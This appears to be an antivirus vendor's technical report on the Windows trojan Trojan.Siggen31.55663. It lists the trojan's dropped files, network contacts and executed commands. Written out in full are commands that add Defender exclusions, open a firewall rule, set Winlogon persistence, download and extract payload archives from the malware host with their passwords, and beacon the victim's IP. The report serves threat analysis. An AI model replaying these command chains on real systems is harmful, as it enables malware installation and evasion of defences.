Trojan.Siggen31.55663

Technical Information

To ensure autorun and distribution

Modifies the following registry keys

[HKLM\software\microsoft\windows nt\currentversion\winlogon] 'shell' = 'explorer.exe, "%LOCALAPPDATA%\google\chrome\user data\wzone.exe" "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wloca...

Malicious functions

To complicate detection of its presence in the operating system,

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\wzone.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionProcess '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' add-mppreference -exclusionPath '%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe'

Executes the following

'<SYSTEM32>\netsh.exe' advfirewall firewall add rule name="windows defender" dir=in action=allow program="%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" enable=yes

Modifies file system

Creates the following files

%TEMP%\qb0d1722.00\gkey.exe
%TEMP%\qb0d1b1a.00\cnf
nul
%TEMP%\cnf
%TEMP%\7z2201.exe
%ProgramFiles(x86)%\7-zip\7-zip.chm
%ProgramFiles(x86)%\7-zip\descript.ion
%ProgramFiles(x86)%\7-zip\history.txt
%ProgramFiles(x86)%\7-zip\lang\af.txt
%ProgramFiles(x86)%\7-zip\lang\an.txt
%ProgramFiles(x86)%\7-zip\lang\ar.txt
%ProgramFiles(x86)%\7-zip\lang\ast.txt
%ProgramFiles(x86)%\7-zip\lang\az.txt
%ProgramFiles(x86)%\7-zip\lang\ba.txt
%ProgramFiles(x86)%\7-zip\lang\be.txt
%ProgramFiles(x86)%\7-zip\lang\bg.txt
%ProgramFiles(x86)%\7-zip\lang\bn.txt
%ProgramFiles(x86)%\7-zip\lang\br.txt
%ProgramFiles(x86)%\7-zip\lang\ca.txt
%ProgramFiles(x86)%\7-zip\lang\co.txt
%ProgramFiles(x86)%\7-zip\lang\cs.txt
%ProgramFiles(x86)%\7-zip\lang\cy.txt
%ProgramFiles(x86)%\7-zip\lang\da.txt
%ProgramFiles(x86)%\7-zip\lang\de.txt
%ProgramFiles(x86)%\7-zip\lang\el.txt
%ProgramFiles(x86)%\7-zip\lang\en.ttt
%ProgramFiles(x86)%\7-zip\lang\eo.txt
%ProgramFiles(x86)%\7-zip\lang\es.txt
%ProgramFiles(x86)%\7-zip\lang\et.txt
%ProgramFiles(x86)%\7-zip\lang\eu.txt
%ProgramFiles(x86)%\7-zip\lang\ext.txt
%ProgramFiles(x86)%\7-zip\lang\fa.txt
%ProgramFiles(x86)%\7-zip\lang\fi.txt
%ProgramFiles(x86)%\7-zip\lang\fr.txt
%ProgramFiles(x86)%\7-zip\lang\fur.txt
%ProgramFiles(x86)%\7-zip\lang\fy.txt
%ProgramFiles(x86)%\7-zip\lang\ga.txt
%ProgramFiles(x86)%\7-zip\lang\gl.txt
%ProgramFiles(x86)%\7-zip\lang\gu.txt
%ProgramFiles(x86)%\7-zip\lang\he.txt
%ProgramFiles(x86)%\7-zip\lang\hi.txt
%ProgramFiles(x86)%\7-zip\lang\hr.txt
%ProgramFiles(x86)%\7-zip\lang\hu.txt
%ProgramFiles(x86)%\7-zip\lang\hy.txt
%ProgramFiles(x86)%\7-zip\lang\id.txt
%ProgramFiles(x86)%\7-zip\lang\io.txt
%ProgramFiles(x86)%\7-zip\lang\is.txt
%ProgramFiles(x86)%\7-zip\lang\it.txt
%ProgramFiles(x86)%\7-zip\lang\ja.txt
%ProgramFiles(x86)%\7-zip\lang\ka.txt
%ProgramFiles(x86)%\7-zip\lang\kaa.txt
%ProgramFiles(x86)%\7-zip\lang\kab.txt
%ProgramFiles(x86)%\7-zip\lang\kk.txt
%ProgramFiles(x86)%\7-zip\lang\ko.txt
%ProgramFiles(x86)%\7-zip\lang\ku-ckb.txt
%ProgramFiles(x86)%\7-zip\lang\ku.txt
%ProgramFiles(x86)%\7-zip\lang\ky.txt
%ProgramFiles(x86)%\7-zip\lang\lij.txt
%ProgramFiles(x86)%\7-zip\lang\lt.txt
%ProgramFiles(x86)%\7-zip\lang\lv.txt
%ProgramFiles(x86)%\7-zip\lang\mk.txt
%ProgramFiles(x86)%\7-zip\lang\mn.txt
%ProgramFiles(x86)%\7-zip\lang\mng.txt
%ProgramFiles(x86)%\7-zip\lang\mng2.txt
%ProgramFiles(x86)%\7-zip\lang\mr.txt
%ProgramFiles(x86)%\7-zip\lang\ms.txt
%ProgramFiles(x86)%\7-zip\lang\nb.txt
%ProgramFiles(x86)%\7-zip\lang\ne.txt
%ProgramFiles(x86)%\7-zip\lang\nl.txt
%ProgramFiles(x86)%\7-zip\lang\nn.txt
%ProgramFiles(x86)%\7-zip\lang\pa-in.txt
%ProgramFiles(x86)%\7-zip\lang\pl.txt
%ProgramFiles(x86)%\7-zip\lang\ps.txt
%ProgramFiles(x86)%\7-zip\lang\pt-br.txt
%ProgramFiles(x86)%\7-zip\lang\pt.txt
%ProgramFiles(x86)%\7-zip\lang\ro.txt
%ProgramFiles(x86)%\7-zip\lang\ru.txt
%ProgramFiles(x86)%\7-zip\lang\sa.txt
%ProgramFiles(x86)%\7-zip\lang\si.txt
%ProgramFiles(x86)%\7-zip\lang\sk.txt
%ProgramFiles(x86)%\7-zip\lang\sl.txt
%ProgramFiles(x86)%\7-zip\lang\sq.txt
%ProgramFiles(x86)%\7-zip\lang\sr-spc.txt
%ProgramFiles(x86)%\7-zip\lang\sr-spl.txt
%ProgramFiles(x86)%\7-zip\lang\sv.txt
%ProgramFiles(x86)%\7-zip\lang\sw.txt
%ProgramFiles(x86)%\7-zip\lang\ta.txt
%ProgramFiles(x86)%\7-zip\lang\tg.txt
%ProgramFiles(x86)%\7-zip\lang\th.txt
%ProgramFiles(x86)%\7-zip\lang\tk.txt
%ProgramFiles(x86)%\7-zip\lang\tr.txt
%ProgramFiles(x86)%\7-zip\lang\tt.txt
%ProgramFiles(x86)%\7-zip\lang\ug.txt
%ProgramFiles(x86)%\7-zip\lang\uk.txt
%ProgramFiles(x86)%\7-zip\lang\uz-cyrl.txt
%ProgramFiles(x86)%\7-zip\lang\uz.txt
%ProgramFiles(x86)%\7-zip\lang\va.txt
%ProgramFiles(x86)%\7-zip\lang\vi.txt
%ProgramFiles(x86)%\7-zip\lang\yo.txt
%ProgramFiles(x86)%\7-zip\lang\zh-cn.txt
%ProgramFiles(x86)%\7-zip\lang\zh-tw.txt
%ProgramFiles(x86)%\7-zip\license.txt
%ProgramFiles(x86)%\7-zip\readme.txt
%ProgramFiles(x86)%\7-zip\7-zip.dll
%ProgramFiles(x86)%\7-zip\7z.dll
%ProgramFiles(x86)%\7-zip\7z.exe
%ProgramFiles(x86)%\7-zip\7z.sfx
%ProgramFiles(x86)%\7-zip\7zcon.sfx
%ProgramFiles(x86)%\7-zip\7zfm.exe
%ProgramFiles(x86)%\7-zip\7zg.exe
%ProgramFiles(x86)%\7-zip\uninstall.exe
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\7-zip\7-zip file manager.lnk
%ALLUSERSPROFILE%\microsoft\windows\start menu\programs\7-zip\7-zip help.lnk
%TEMP%\m.7z
%TEMP%\m.bat
%TEMP%\netframework.4.8.7z
%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\u05.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\1028\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1029\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1031\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1033\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1036\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1040\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1041\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1042\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1045\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1046\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1049\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\1055\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\2052\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\3082\vsjitdebuggerui.dll
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe
%LOCALAPPDATA%\microsoft\clr_v4.0\usagelogs\wzone.exe.log
%LOCALAPPDATA%\google\chrome\user data\r01.txt

Sets the 'hidden' attribute to the following files

%LOCALAPPDATA%\google\chrome\user data\01.txt
%LOCALAPPDATA%\google\chrome\user data\s01.txt
%LOCALAPPDATA%\google\chrome\user data\wtime.cmd
%LOCALAPPDATA%\google\chrome\user data\7z.dll
%LOCALAPPDATA%\google\chrome\user data\7z.exe
%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe
%LOCALAPPDATA%\google\chrome\user data\wzone.exe

Network activity

Connects to

'ip##fo.io':443
'c.###titmp.net':443
'7-##p.org':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443
'ze###tmp.net':443

TCP

Other

'ip##fo.io':443
'c.###titmp.net':443
'7-##p.org':443
'gi##ub.com':443
're#########ets.githubusercontent.com':443

UDP

DNS ASK ip##fo.io
DNS ASK c.###titmp.net
DNS ASK 7-##p.org
DNS ASK gi##ub.com
DNS ASK re#########ets.githubusercontent.com
DNS ASK ze###tmp.net

Miscellaneous

Creates and executes the following

'%TEMP%\qb0d1722.00\gkey.exe'
'%TEMP%\7z2201.exe' /S
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\m.7z" -o"%LOCALAPPDATA%\Temp" -pconfigvpnG2012885838482012ggg -y
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %TEMP%\m.bat
'%ProgramFiles(x86)%\7-zip\7z.exe' x "%TEMP%\NetFramework.4.8.7z" -o"%LOCALAPPDATA%\google\chrome\user data" -pvgfjyghtnhnlfjh7trhjfnhfg -y
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd
'%LOCALAPPDATA%\google\chrome\user data\wzone.exe' "%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe" -yr001
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001

Executes the following

'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\qb0D1722.00\gkey.exe"
'<SYSTEM32>\mode.com' 120, 31
'<SYSTEM32>\net.exe' session
'<SYSTEM32>\net1.exe' session
'<SYSTEM32>\cmd.exe' /C copy "%TEMP%\qb0D1B1A.00\cnf" "%TEMP%\cnf"
'<SYSTEM32>\cmd.exe' /c wmic path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\wbem\wmic.exe' path win32_LocalTime Get Day,Month,Year /value
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq SbieSvc.exe" /fo csv /nh
'<SYSTEM32>\reg.exe' query "HKLM\SOFTWARE\Microsoft\Alu" /s /reg:32
'<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Alu" /f /reg:32
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c reg query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\reg.exe' query "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current" /v "SystemProductName"
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq ekrn.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /c tasklist /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\tasklist.exe' /fi "imagename eq QHActiveDefense.exe" /fo csv /nh
'<SYSTEM32>\cmd.exe' /C dir /S "%ProgramFiles%\Kaspersky Lab\*.exe"
'<SYSTEM32>\cmd.exe' /C dir /S "%ProgramFiles(x86)%\Kaspersky Lab\*.exe"
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/ip -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/ip -k
'<SYSTEM32>\cmd.exe' /c curl https://ipinfo.io/country -k
'<SYSTEM32>\curl.exe' https://ipinfo.io/country -k
'<SYSTEM32>\wbem\wmic.exe' os get caption
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 7" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 7"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 8" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 8"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 8.1" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 8.1"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 10" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 10"
'<SYSTEM32>\cmd.exe' /S /C" ( findstr /ilc:"Windows 11" 1>nul )"
'<SYSTEM32>\findstr.exe' /ilc:"Windows 11"
'<SYSTEM32>\cmd.exe' /c curl -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k https://c.zeltitmp.net/c01.php --user-agent "c010101"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\7z2201.exe" -L -C - "https://www.7-zip.org/a/7z2201.exe" --retry 3
'<SYSTEM32>\cmd.exe' /C start "" "%TEMP%\7z2201.exe" /S
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\m.7z" -L "https://zeltitmp.net/pp/m.7z" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\m.bat""
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\currentcontrolset\control\systemInformation" /v "systemproductname"
'<SYSTEM32>\cmd.exe' /c reg query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\reg.exe' query "hklm\system\hardwareconfig\current" /v "systemproductname"
'<SYSTEM32>\curl.exe' -k -o "%TEMP%\NetFramework.4.8.7z" -L -C - "https://zeltitmp.net/pp/NetFramework.4.8.7z" --user-agent "cnfvp201" --retry 3
'<SYSTEM32>\attrib.exe' +h +s "%LOCALAPPDATA%\google"
'<SYSTEM32>\reg.exe' add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "shell" /t reg_sz /d "explorer.exe, \"%LOCALAPPDATA%\google\chrome\user data\wzone.exe\" \"%LOCALAPPDATA%\google\chrome\user ...
'<SYSTEM32>\curl.exe' -k -L "https://zeltitmp.net/pp/cu/cu_p.php?ip=18#.#3.40.66&vos=10&cid=RU&sid=goddy46&s=1" --user-agent "cnfvp201"
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"
'<SYSTEM32>\cmd.exe' /C del %TEMP%\cnf
'<SYSTEM32>\cmd.exe' /C del %TEMP%\cc.7z
'<SYSTEM32>\ping.exe' -n 10 127.0.0.1
'<SYSTEM32>\ping.exe' -n 3 127.0.0.1
'<SYSTEM32>\cmd.exe' /c ""%LOCALAPPDATA%\google\chrome\user data\wtime.cmd" wlocale.cmd"' (with hidden window)
'%LOCALAPPDATA%\google\chrome\user data\windows driver foundation (wdf).exe' -yr001' (with hidden window)

Технологии

Термины

Обучение и просвещение

Мифы

Technical Information

Рекомендации по лечению

Демо бесплатно на 14 дней